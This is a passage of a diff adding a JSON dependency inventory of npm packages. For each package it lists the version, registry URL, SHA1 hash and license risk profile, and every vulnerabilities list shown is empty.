"THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/opentracing/opentracing-javascript/blob/v0.14.4/package.json" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "20a3364b-ba41-46af-9cf7-0a4db02d77c9", + "keyId": 27088516, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/listr-update-renderer/-/listr-update-renderer-0.4.0.tgz", + "homePage": "https://github.com/samverschueren/listr-update-renderer#readme", + "genericPackageIndex": "https://www.npmjs.org/package/listr-update-renderer" + }, + "matchType": "SHA1", + "sha1": "344d980da2ca2e8b145ba305908f32ae3f4cc8a7", + "name": "listr-update-renderer-0.4.0.tgz", + "artifactId": "listr-update-renderer-0.4.0.tgz", + "version": "0.4.0", + "groupId": "listr-update-renderer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/listr-update-renderer/v/0.4.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d23e543e-7d45-4a20-b694-95653ee7f72a", + "keyId": 27051872, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ast-types/-/ast-types-0.11.7.tgz", + "homePage": "http://github.com/benjamn/ast-types", + "genericPackageIndex": "https://www.npmjs.org/package/ast-types" + }, + "matchType": "SHA1", + "sha1": "f318bf44e339db6a320be0009ded64ec1471f46c", + "name": "ast-types-0.11.7.tgz", + "artifactId": "ast-types-0.11.7.tgz", + "version": "0.11.7", + "groupId": "ast-types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/4aee1f0d-c7ad-4bb1-ac5c-c781d1a313e9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5278e229-9ec2-4d96-8f99-0503798b9b69", + "keyId": 27917152, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/semver/-/semver-5.7.1.tgz", + "homePage": "https://github.com/npm/node-semver#readme", + "genericPackageIndex": "https://www.npmjs.org/package/semver" + }, + "matchType": "SHA1", + "sha1": "a954f931aeba508d307bbf069eff0c01c96116f7", + "name": "semver-5.7.1.tgz", + "artifactId": "semver-5.7.1.tgz", + "version": "5.7.1", + "groupId": "semver", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/0d514fa7-6574-4541-9306-618560db8318" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3d8c7aac-8121-4b17-9e1f-fedf65a713fb", + "keyId": 28432166, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-alert/-/honeyui-alert-1.2.0.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/alert#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-alert" + }, + "matchType": "SHA1", + "sha1": "ef74d42e29f02117ceb83721134435f5e0167445", + "name": "honeyui-alert-1.2.0.tgz", + "artifactId": "honeyui-alert-1.2.0.tgz", + "version": "1.2.0", + "groupId": "@test/honeyui-alert", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d9cc9612-a4e9-4a62-8f0f-d6c1e25d8154", + "keyId": 28432154, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-jumbotron/-/honeyui-jumbotron-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/jumbotron#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-jumbotron" + }, + "matchType": "SHA1", + "sha1": "b24f3d0ff70f4112cecbeeff3ae54ab8233d5236", + "name": "honeyui-jumbotron-1.1.1.tgz", + "artifactId": "honeyui-jumbotron-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-jumbotron", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c2ca6934-3f00-48c4-9eaa-5fcda55ec391", + "keyId": 27863452, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/promise-polyfill/-/promise-polyfill-8.1.3.tgz", + "homePage": "https://github.com/taylorhakes/promise-polyfill", + "genericPackageIndex": "https://www.npmjs.org/package/promise-polyfill" + }, + "matchType": "SHA1", + "sha1": "8c99b3cf53f3a91c68226ffde7bde81d7f904116", + "name": "promise-polyfill-8.1.3.tgz", + "artifactId": "promise-polyfill-8.1.3.tgz", + "version": "8.1.3", + "groupId": "promise-polyfill", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/promise-polyfill" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "aac9da1a-838c-4b3c-b860-b5ebae0bd055", + "keyId": 27100028, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mute-stream/-/mute-stream-0.0.8.tgz", + "homePage": "https://github.com/isaacs/mute-stream#readme", + "genericPackageIndex": "https://www.npmjs.org/package/mute-stream" + }, + "matchType": "SHA1", + "sha1": "1630c42b2251ff81e2a283de96a5497ea92e5e0d", + "name": "mute-stream-0.0.8.tgz", + "artifactId": "mute-stream-0.0.8.tgz", + "version": "0.0.8", + "groupId": "mute-stream", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5708a755-6ddf-4920-ada9-cfce144c232a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3dc07fcd-4264-47c4-b0ce-540461d68906", + "keyId": 27212368, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.flow/-/lodash.flow-3.5.0.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.flow" + }, + "matchType": "SHA1", + "sha1": "87bf40292b8cf83e4e8ce1a3ae4209e20071675a", + "name": "lodash.flow-3.5.0.tgz", + "artifactId": "lodash.flow-3.5.0.tgz", + "version": "3.5.0", + "groupId": "lodash.flow", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash.flow/v/3.5.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "267d1b97-c480-4e7e-b782-036280c9c8ef", + "keyId": 27371279, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/p-is-promise/-/p-is-promise-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/p-is-promise#readme", + "genericPackageIndex": "https://www.npmjs.org/package/p-is-promise" + }, + "matchType": "SHA1", + "sha1": "918cebaea248a62cf7ffab8e3bca8c5f882fc42e", + "name": "p-is-promise-2.1.0.tgz", + "artifactId": "p-is-promise-2.1.0.tgz", + "version": "2.1.0", + "groupId": "p-is-promise", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/p-is-promise" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1e7bae7e-55a0-4a6c-a911-c8c3bd9bf877", + "keyId": 26973578, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/retry/-/retry-0.12.0.tgz", + "homePage": "https://github.com/tim-kos/node-retry", + "genericPackageIndex": "https://www.npmjs.org/package/retry" + }, + "matchType": "SHA1", + "sha1": "1b42a6266a21f07421d1b0b54b7dc167b01c013b", + "name": "retry-0.12.0.tgz", + "artifactId": "retry-0.12.0.tgz", + "version": "0.12.0", + "groupId": "retry", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/33f1606a-d07c-4535-9657-29fcd0cca56b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "efd1521f-aadc-4c60-9ff7-b573f313791f", + "keyId": 28109823, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/fast-safe-stringify/-/fast-safe-stringify-2.0.7.tgz", + "homePage": "https://github.com/davidmarkclements/fast-safe-stringify#readme", + "genericPackageIndex": "https://www.npmjs.org/package/fast-safe-stringify" + }, + "matchType": "SHA1", + "sha1": "124aa885899261f68aedb42a7c080de9da608743", + "name": "fast-safe-stringify-2.0.7.tgz", + "artifactId": "fast-safe-stringify-2.0.7.tgz", + "version": "2.0.7", + "groupId": "fast-safe-stringify", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/fast-safe-stringify/v/2.0.7" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "01d88b72-1a12-4203-b5a8-1d83faeb2c7f", + "keyId": 27654927, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/async-retry/-/async-retry-1.2.3.tgz", + "homePage": "https://github.com/zeit/async-retry#readme", + "genericPackageIndex": "https://www.npmjs.org/package/async-retry" + }, + "matchType": "SHA1", + "sha1": "a6521f338358d322b1a0012b79030c6f411d1ce0", + "name": "async-retry-1.2.3.tgz", + "artifactId": "async-retry-1.2.3.tgz", + "version": "1.2.3", + "groupId": "async-retry", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/779c9581-19a2-4df6-ba81-004f4ab3199a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "704bf732-6aa3-4598-ad3e-05f01d73e1f0", + "keyId": 27100380, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-media-minmax/-/postcss-media-minmax-4.0.0.tgz", + "homePage": "https://github.com/postcss/postcss-media-minmax#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-media-minmax" + }, + "matchType": "SHA1", + "sha1": "b75bb6cbc217c8ac49433e12f22048814a4f5ed5", + "name": "postcss-media-minmax-4.0.0.tgz", + "artifactId": "postcss-media-minmax-4.0.0.tgz", + "version": "4.0.0", + "groupId": "postcss-media-minmax", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-media-minmax/v/4.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2a7ba166-0e77-414a-92a2-984fbcc28e10", + "keyId": 27139279, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/redeyed/-/redeyed-1.0.1.tgz", + "homePage": "https://github.com/thlorenz/redeyed#readme", + "genericPackageIndex": "https://www.npmjs.org/package/redeyed" + }, + "matchType": "SHA1", + "sha1": "e96c193b40c0816b00aec842698e61185e55498a", + "name": "redeyed-1.0.1.tgz", + "artifactId": "redeyed-1.0.1.tgz", + "version": "1.0.1", + "groupId": "redeyed", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/redeyed/v/1.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "cbad8e34-9457-4b56-9c79-c59dc3c07c97", + "keyId": 27039807, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/get-stdin/-/get-stdin-5.0.1.tgz", + "homePage": "https://github.com/sindresorhus/get-stdin", + "genericPackageIndex": "https://www.npmjs.org/package/get-stdin" + }, + "matchType": "SHA1", + "sha1": "122e161591e21ff4c52530305693f20e6393a398", + "name": "get-stdin-5.0.1.tgz", + "artifactId": "get-stdin-5.0.1.tgz", + "version": "5.0.1", + "groupId": "get-stdin", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d9ea413c-dcbf-4116-ab99-553d4940cea2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "67d42cc8-3da9-4b76-b0f9-7a7dac3d9748", + "keyId": 28432199, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/zlib/-/zlib-1.0.5.tgz", + "homePage": "https://github.com/kkaefer/node-zlib", + "genericPackageIndex": "https://www.npmjs.org/package/zlib" + }, + "matchType": "SHA1", + "sha1": "6e7c972fc371c645a6afb03ab14769def114fcc0", + "name": "zlib-1.0.5.tgz", + "artifactId": "zlib-1.0.5.tgz", + "version": "1.0.5", + "groupId": "zlib", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/42f70ee8-bc3a-477d-9aa8-9e45d810ae51" + }, + { + "name": "BSD", + "url": "http://www.linfo.org/bsdlicense.html", + "riskLevel": "unknown", + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/zlib/v/1.0.5" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b7ff71da-2629-4381-92e7-97e3dd06c7dd", + "keyId": 28432189, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/bfj/-/bfj-5.3.1.tgz", + "homePage": "https://github.com/philbooth/bfj", + "genericPackageIndex": "https://www.npmjs.org/package/bfj" + }, + "matchType": "SHA1", + "sha1": "4af90fb3d0513cab1f7e623f5636ae3d21931529", + "name": "bfj-5.3.1.tgz", + "artifactId": "bfj-5.3.1.tgz", + "version": "5.3.1", + "groupId": "bfj", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/bfj/v/5.3.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d102bc54-2be5-47c9-afc6-bf24da27c7e1", + "keyId": 27253232, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-modules-extract-imports/-/postcss-modules-extract-imports-2.0.0.tgz", + "homePage": "https://github.com/css-modules/postcss-modules-extract-imports", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-modules-extract-imports" + }, + "matchType": "SHA1", + "sha1": "818719a1ae1da325f9832446b01136eeb493cd7e", + "name": "postcss-modules-extract-imports-2.0.0.tgz", + "artifactId": "postcss-modules-extract-imports-2.0.0.tgz", + "version": "2.0.0", + "groupId": "postcss-modules-extract-imports", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-modules-extract-imports/v/2.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8850fc80-12b1-4879-b528-42999a456fb2", + "keyId": 26967799, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/spawn-sync/-/spawn-sync-1.0.15.tgz", + "homePage": "https://github.com/ForbesLindesay/spawn-sync#readme", + "genericPackageIndex": "https://www.npmjs.org/package/spawn-sync" + }, + "matchType": "SHA1", + "sha1": "b00799557eb7fb0c8376c29d44e8a1ea67e57476", + "name": "spawn-sync-1.0.15.tgz", + "artifactId": "spawn-sync-1.0.15.tgz", + "version": "1.0.15", + "groupId": "spawn-sync", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/spawn-sync/v/1.0.15" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1008ea14-759c-4788-9651-aab0142d5c9a", + "keyId": 26955354, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cli-cursor/-/cli-cursor-1.0.2.tgz", + "homePage": "https://github.com/sindresorhus/cli-cursor#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cli-cursor" + }, + "matchType": "SHA1", + "sha1": "64da3f7d56a54412e59794bd62dc35295e8f2987", + "name": "cli-cursor-1.0.2.tgz", + "artifactId": "cli-cursor-1.0.2.tgz", + "version": "1.0.2", + "groupId": "cli-cursor", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b1530909-87bc-4517-aed2-f105b9e46b79" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d87bcb3c-e43e-4b03-a10e-53d6fb3bb9ff", + "keyId": 26965595, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/require-in-the-middle/-/require-in-the-middle-2.2.2.tgz", + "homePage": "https://github.com/opbeat/require-in-the-middle#readme", + "genericPackageIndex": "https://www.npmjs.org/package/require-in-the-middle" + }, + "matchType": "SHA1", + "sha1": "1d3124709cf43bf2c1f225082e6d8394e2f9d4f4", + "name": "require-in-the-middle-2.2.2.tgz", + "artifactId": "require-in-the-middle-2.2.2.tgz", + "version": "2.2.2", + "groupId": "require-in-the-middle", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/41b8298c-e7ad-43a5-a800-e51a2887fee0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1fbcb8be-65bf-4e33-8278-ad6c865f69a8", + "keyId": 26966993, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cliui/-/cliui-4.1.0.tgz", + "homePage": "https://github.com/yargs/cliui#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cliui" + }, + "matchType": "SHA1", + "sha1": "348422dbe82d800b3022eef4f6ac10bf2e4d1b49", + "name": "cliui-4.1.0.tgz", + "artifactId": "cliui-4.1.0.tgz", + "version": "4.1.0", + "groupId": "cliui", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5dfb2cc9-e2f3-418a-b34f-90dd73948754" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b615e64a-3cff-458e-9960-a73db6b57d42", + "keyId": 27064193, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/callsites/-/callsites-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/callsites#readme", + "genericPackageIndex": "https://www.npmjs.org/package/callsites" + }, + "matchType": "SHA1", + "sha1": "c14c24188ce8e1d6a030b4c3c942e6ba895b6a1a", + "name": "callsites-1.0.1.tgz", + "artifactId": "callsites-1.0.1.tgz", + "version": "1.0.1", + "groupId": "callsites", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/callsites/v/1.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3d82f616-8db5-4039-813a-fdd7bfbd89c4", + "keyId": 28389855, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/conf/-/conf-5.0.0.tgz", + "homePage": "https://github.com/sindresorhus/conf#readme", + "genericPackageIndex": "https://www.npmjs.org/package/conf" + }, + "matchType": "SHA1", + "sha1": "6530308a36041bf010ab96b05a0f4aff5101c65d", + "name": "conf-5.0.0.tgz", + "artifactId": "conf-5.0.0.tgz", + "version": "5.0.0", + "groupId": "conf", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/50b4f331-0769-4ad3-98a4-bef8bd002af9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1641fb07-a768-4b6b-b22c-fab12ea20be1", + "keyId": 27714980, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/check-types/-/check-types-8.0.3.tgz", + "homePage": "https://gitlab.com/philbooth/check-types.js", + "genericPackageIndex": "https://www.npmjs.org/package/check-types" + }, + "matchType": "SHA1", + "sha1": "3356cca19c889544f2d7a95ed49ce508a0ecf552", + "name": "check-types-8.0.3.tgz", + "artifactId": "check-types-8.0.3.tgz", + "version": "8.0.3", + "groupId": "check-types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/check-types" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bed1059a-e317-4ed2-b3c3-145adb4e76ee", + "keyId": 27040103, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/typedarray-to-buffer/-/typedarray-to-buffer-3.1.5.tgz", + "homePage": "http://feross.org", + "genericPackageIndex": "https://www.npmjs.org/package/typedarray-to-buffer" + }, + "matchType": "SHA1", + "sha1": "a97ee7a9ff42691b9f783ff1bc5112fe3fca9080", + "name": "typedarray-to-buffer-3.1.5.tgz", + "artifactId": "typedarray-to-buffer-3.1.5.tgz", + "version": "3.1.5", + "groupId": "typedarray-to-buffer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/typedarray-to-buffer" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f21a82a2-4283-4892-ac74-9e5be3a7c79b", + "keyId": 27100305, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-custom-selectors/-/postcss-custom-selectors-5.1.2.tgz", + "homePage": "https://github.com/postcss/postcss-custom-selectors#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-custom-selectors" + }, + "matchType": "SHA1", + "sha1": "64858c6eb2ecff2fb41d0b28c9dd7b3db4de7fba", + "name": "postcss-custom-selectors-5.1.2.tgz", + "artifactId": "postcss-custom-selectors-5.1.2.tgz", + "version": "5.1.2", + "groupId": "postcss-custom-selectors", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/33a00f62-1387-4412-8bc0-ab720f693005" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b4c494b3-4b3d-4e39-8f08-9e4ceba20328", + "keyId": 28432135, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/contentful-sdk-core/-/contentful-sdk-core-6.4.0.tgz", + "homePage": "https://www.contentful.com/developers/docs/javascript/", + "genericPackageIndex": "https://www.npmjs.org/package/contentful-sdk-core" + }, + "matchType": "SHA1", + "sha1": "3b42991ae9084baf1bc5d01c61cb54441f740803", + "name": "contentful-sdk-core-6.4.0.tgz", + "artifactId": "contentful-sdk-core-6.4.0.tgz", + "version": "6.4.0", + "groupId": "contentful-sdk-core", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/contentful-sdk-core/v/6.4.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "79d482e1-6c09-4950-a0c4-24c722fee45f", + "keyId": 28432150, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cli-source-preview/-/cli-source-preview-1.1.0.tgz", + "homePage": "https://github.com/yibn2008/cli-source-preview#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cli-source-preview" + }, + "matchType": "SHA1", + "sha1": 